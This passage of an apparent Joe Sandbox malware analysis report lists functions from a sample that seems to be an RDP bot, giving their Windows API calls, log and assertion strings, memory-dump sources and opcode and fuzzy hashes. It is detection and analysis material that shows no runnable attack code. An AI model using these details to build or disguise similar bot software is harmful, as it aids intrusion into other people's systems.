String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: 8a32a5f15bec551d0fa06d9b8f111ba04d32c29d8a1e9e0671d5aa2e5a35198a
Instruction ID: 266d3e34f01febe192ac4cbf53e3922e746344fbb0c76b72f68f5634d6ae7558
Opcode Fuzzy Hash: 8a32a5f15bec551d0fa06d9b8f111ba04d32c29d8a1e9e0671d5aa2e5a35198a
Instruction Fuzzy Hash: BC21D362A08E42CEE7109F16E8417AA7771BB647A4F4441B2EE5D57A70CF3CE985C708

Function 00007FFE13386B89 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FFE13386C27
GetLastError.KERNEL32 ref: 00007FFE13386C42

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FFE13386BFD
NULL, xrefs: 00007FFE13386D85, 00007FFE13386D91
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FFE13386DAE
[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FFE13386C60
fs_file_copy, xrefs: 00007FFE13386BF6, 00007FFE13386C59, 00007FFE13386DA7

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 0cde63d2d73bc3ee3e4985846507ab73c88c7410a3840d6540dc0cbde3aaf1ce
Instruction ID: 1389cf2255ea279cc27f08ce89347e0b910c984261facc1296d679c2867b8aec
Opcode Fuzzy Hash: 0cde63d2d73bc3ee3e4985846507ab73c88c7410a3840d6540dc0cbde3aaf1ce
Instruction Fuzzy Hash: FD418351D0CE5A8DFA254A1BA80037D26557F20BBCF0402F6CA3F76AB0DE5CA6C5A309

Function 00007FFE133865BD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32 ref: 00007FFE133865D4
GetLastError.KERNEL32 ref: 00007FFE1338662B

Strings

[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FFE13386640
fs_file_delete, xrefs: 00007FFE1338660D, 00007FFE13386639, 00007FFE13386769
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13386614
NULL, xrefs: 00007FFE1338675A
[I] (%s) -> Done(path=%s), xrefs: 00007FFE13386770

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 58a51e74656b0af7e942238bf432331166d2bea4ac7c9a4a536c398104f5d388
Instruction ID: 047d1a38bc33608ec47bf50ded60d1bfca9985aebbd00c6e9d0a0c26dcd3fefb
Opcode Fuzzy Hash: 58a51e74656b0af7e942238bf432331166d2bea4ac7c9a4a536c398104f5d388
Instruction Fuzzy Hash: E1311C51E0DE4B8EFE205A16A4403BC21414F71374F9402F2DA3EBAAB5ED1CE9C5A30E

Function 00007FFE13388E9C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE13388ED6
strlen.MSVCRT ref: 00007FFE13388EE1

Strings

(pattern != NULL), xrefs: 00007FFE13388F45
((match == NULL) || (match_len != NULL)), xrefs: 00007FFE13388F7E
str_match, xrefs: 00007FFE13388F13, 00007FFE13388F4C, 00007FFE13388F85
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13388F1A, 00007FFE13388F53, 00007FFE13388F8C
(needle != NULL), xrefs: 00007FFE13388F0C
C:/Projects/rdp/bot/codebase/utils.c, xrefs: 00007FFE13388F05, 00007FFE13388F3E, 00007FFE13388F77

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-892027187
Opcode ID: 4d2c137a5ca34b3a41fb2fe785c001060c3ab27a8fe74f4b335b356c5c02f14a
Instruction ID: ded8fcd02bfbcf7c42e68fff9c0376276aef2ca82c465f27ebca88a0f454a1cf
Opcode Fuzzy Hash: 4d2c137a5ca34b3a41fb2fe785c001060c3ab27a8fe74f4b335b356c5c02f14a
Instruction Fuzzy Hash: 3F51B3D1B0DD439DFA158A17B8103BD1A527F317A8F4402F2D96E6AAB0DE2DE985C308

Function 00007FFE13388699 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE13388712
strlen.MSVCRT ref: 00007FFE1338872E
strcat.MSVCRT ref: 00007FFE1338873D
strlen.MSVCRT ref: 00007FFE13388748

Strings

fs_module_file, xrefs: 00007FFE133886F5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133886FC
(file_path != NULL), xrefs: 00007FFE133886EE
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133886E7

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strlen$strcat
String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
API String ID: 2335785903-2423714266
Opcode ID: 5219bfe88a4293736111a7c31e3a6ed39a6b726d201ebfbc16992e6b5c0e07c9
Instruction ID: 0d86867a01c0341a024ab25226711ace7d6596786ec4e06241878a172c38aec9
Opcode Fuzzy Hash: 5219bfe88a4293736111a7c31e3a6ed39a6b726d201ebfbc16992e6b5c0e07c9
Instruction Fuzzy Hash: B611A552E0CE474CFA055E2768043BD1A921F317E4F4C46F0DB2D2E6B2DE2DA4808304

Function 00007FFE13387E97 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE13387EA0
GetLastError.KERNEL32 ref: 00007FFE13387EE5

Strings

(path != NULL), xrefs: 00007FFE13387EC4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13387ED2
fs_path_exists, xrefs: 00007FFE13387ECB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13387EBD

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: a4b2d97e6a775f1c1535ac20e491ba85971c6ba7deebe2af963bd61ba2e115fa
Instruction ID: dc3e023662f771a39d3b316053c02f468a929dd743ef827fda73f696281baded
Opcode Fuzzy Hash: a4b2d97e6a775f1c1535ac20e491ba85971c6ba7deebe2af963bd61ba2e115fa
Instruction Fuzzy Hash: D521C450E0DC438AFB22421A944837D16435F20329F6447F2E13EBAAB0CE6DFCE5925A

Function 00007FFE13382550 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FFE13382562

Strings

(s != NULL), xrefs: 00007FFE133825A9
ip4_from_str, xrefs: 00007FFE133825B0, 00007FFE133825E0
C:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFE133825A2, 00007FFE133825D2
(v != NULL), xrefs: 00007FFE133825D9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133825B7, 00007FFE133825E7

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: inet_addr
String ID: (s != NULL)$(v != NULL)$C:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
API String ID: 1393076350-1216860922
Opcode ID: 7f7db49ab8739c9b5712ac515c28f81b017c72279804716331c1bac347e72ec9
Instruction ID: 8a37170900f59343444dd5810c8a8f65de6e5508fda81721d6e78e879b9e42bf
Opcode Fuzzy Hash: 7f7db49ab8739c9b5712ac515c28f81b017c72279804716331c1bac347e72ec9
Instruction Fuzzy Hash: 8F112EE090DD4B8EFB149B26A4103B8A391AF34364F4442F1D56EAA5B5EF3DE9859308

Function 00007FFE1338525C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13385154: LoadLibraryA.KERNEL32 ref: 00007FFE13385162

GetLastError.KERNEL32 ref: 00007FFE133852D8

Part of subcall function 00007FFE133850D3: GetProcAddress.KERNEL32 ref: 00007FFE133850F3

Strings

[I] (%s) -> %s, xrefs: 00007FFE133852C2
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FFE133852E8
Done, xrefs: 00007FFE133852B4
Wow64RevertWow64FsRedirection, xrefs: 00007FFE1338527D
kernel32, xrefs: 00007FFE13385269
fs_wow_redir_revert, xrefs: 00007FFE133852BB, 00007FFE133852E1

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: 9b700d28ed91bfab59ffa1db2879eba2b7b4d771a22d34dad83c008a7b71e121
Instruction ID: 008626fbd6e525eaf84d94077c0b59ced5e64625e3fd866f850e39489f4a0d35
Opcode Fuzzy Hash: 9b700d28ed91bfab59ffa1db2879eba2b7b4d771a22d34dad83c008a7b71e121
Instruction Fuzzy Hash: DD119A60E09E47CDFA109727E8403B822916F70364F5001F6D42EB96F5EEADE984C348

Function 00007FFE1338100C Relevance: 9.1, APIs: 6, Instructions: 102sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,00000000,00007FFE1338F044,00007FFE13381243), ref: 00007FFE13381081
_amsg_exit.MSVCRT(?,00000000,00007FFE1338F044,00007FFE13381243), ref: 00007FFE133810A3
_initterm.MSVCRT ref: 00007FFE133810DD
Sleep.KERNEL32(?,00000000,00007FFE1338F044,00007FFE13381243), ref: 00007FFE13381135
_amsg_exit.MSVCRT(?,00000000,00007FFE1338F044,00007FFE13381243), ref: 00007FFE1338114C

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Sleep_amsg_exit$_initterm
String ID:
API String ID: 2193611136-0
Opcode ID: 44bbde860a3edeeaa30dd7d665b09d0d3c475e80bdcbd8e9cfabc7b51761c1ce
Instruction ID: c47e10bc0746840cf2c71c66700ef8352f99afc9b1f5545696407799954b7cbd
Opcode Fuzzy Hash: 44bbde860a3edeeaa30dd7d665b09d0d3c475e80bdcbd8e9cfabc7b51761c1ce
Instruction Fuzzy Hash: EA414D61E09E42CDFB519B17D85027D23A1AF64BA4F5841F1CD2EA7BB5DE2CE4808358

Function 00007FFE13383307 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9networkCOMMON

Download Yara Rule

APIs

WSACleanup.WS2_32 ref: 00007FFE1338330B

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[I] (%s) -> %s, xrefs: 00007FFE1338331F
Done, xrefs: 00007FFE13383311
net_cleanup, xrefs: 00007FFE13383318

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Cleanupfflushfwrite
String ID: Done$[I] (%s) -> %s$net_cleanup
API String ID: 1441811225-3926276259
Opcode ID: 4f0e0253e0c6e05c14c783af6b7db350f88ab70b83a7d078b74eb60278dd72d4
Instruction ID: 27be88e251c9f7e6bfc0af0a56b8360daf8d6ba99b1ed3a969eb9c3fa0d83f73
Opcode Fuzzy Hash: 4f0e0253e0c6e05c14c783af6b7db350f88ab70b83a7d078b74eb60278dd72d4
Instruction Fuzzy Hash: 48D01250D09C07DCEA046753EC411B46362AF72324FD050F2C02E211718E2CB14EC708

Function 00007FFE1338126E Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 00007FFE1338E770
_unlock.MSVCRT ref: 00007FFE1338E797
realloc.MSVCRT ref: 00007FFE1338E7CD
_unlock.MSVCRT ref: 00007FFE1338E7FC

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: _unlock$_lockrealloc
String ID:
API String ID: 4047297157-0
Opcode ID: 71741dcca08acb83e063b315e9e0101e0fd40cb23ab8f7ef72ce332049503488
Instruction ID: f8a43a4e8b28ef280aa308589a17fe504b35f41583df1a316bfa398ce21b113a
Opcode Fuzzy Hash: 71741dcca08acb83e063b315e9e0101e0fd40cb23ab8f7ef72ce332049503488
Instruction Fuzzy Hash: F711D621A0AF4189FB455F22D81036C62D5EF64BB4F1886B0EA6D5BBD4DE3CE8D1C324

Function 00007FFE1338637E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304

Function 00007FFE13386388 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304

Function 00007FFE13386392 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304

Function 00007FFE1338639C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
Instruction ID: 2effbb2ac9323e81c0951529680ace9405c80b9dfadc3614038775184c3fdaca
Opcode Fuzzy Hash: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
Instruction Fuzzy Hash: A1F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F5CE2D2AAE5AE3DA8C39304

Function 00007FFE133863A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
Instruction ID: c2a27a62da5da4cceb82ddc2cc13f70b9069f1db666b2499920285fa7883c871
Opcode Fuzzy Hash: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
Instruction Fuzzy Hash: 63F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F68E2D2AEE5AE3DA8C39304

Function 00007FFE13386286 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFE13386530

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
fs_file_read, xrefs: 00007FFE13386565

Memory Dump Source

